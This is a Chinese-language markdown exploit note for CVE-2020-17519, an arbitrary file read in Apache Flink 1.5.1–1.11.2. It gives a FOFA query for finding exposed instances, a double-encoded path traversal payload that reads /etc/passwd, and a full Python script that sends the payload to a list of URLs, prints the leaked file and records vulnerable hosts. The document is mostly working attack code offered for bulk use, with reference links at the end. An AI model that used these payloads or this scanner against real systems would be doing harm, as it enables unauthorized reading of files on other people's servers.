CVE-2020-17519 Apache Flink 任意文件读取.md

2.82 KB / 2021-05-21 09:14:38
    # CVE-2020-17519 Apache Flink 任意文件读取

影响范围

Apache Flink 1.5.1 ~ 1.11.2

FOFA：

```
app="APACHE-Flink" 
```

PoC：

```
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

批量CVE-2020-17519.py：


```python
#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are Apache Flink 1.11.0-1.11.2

import requests,sys,colorama
from colorama import *
init(autoreset=True)


banner='''\033[1;33;40m
  _______      ________    ___   ___ ___   ___        __ ______ _____ __  ___  
 / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ |____  | ____/_ |/ _ \ 
| |     \ \  / /| |__ ______ ) | | | | ) | | | |______| |   / /| |__  | | (_) |
| |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |  / / |___ \ | |\__, |
| |____   \  /  | |____    / /_| |_| / /_| |_| |      | | / /   ___) || |  / / 
 \_____|   \/   |______|  |____|\___/____|\___/       |_|/_/   |____/ |_| /_/                                                                                                                                                 
'''


def verify():
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
        payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd' 
        poc=urls+payload
        try:
                requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
                response=requests.get(poc,headers=headers,timeout=15,verify=False)
                if response.status_code==200 and "root:x" in response.content:
                        print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
                        print(response.content)
                        #将漏洞地址输出在Vul.txt中
                        f=open('./vul.txt','a')
                        f.write(urls)
                        f.write('\n')
                else:
                        print('\033[1;32;40m[-]{} None'.format(urls))
        except:
                print('{} request timeout'.format(urls))


if __name__ == '__main__':
        print (banner)
        if len(sys.argv)!=2:
                print('Example:python CVE-2020-17519.py urls.txt')
        else:
                file = open(sys.argv[1])
                for url in file.readlines():
                        urls=url.strip()
                        if urls[-1]=='/':
                                urls=urls[:-1]
                        verify()
                print ('Check Over')
```

ref：

https://help.aliyun.com/noticelist/articleid/1060777426.html

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

https://forum.ywhack.com/thread-114923-1-1.html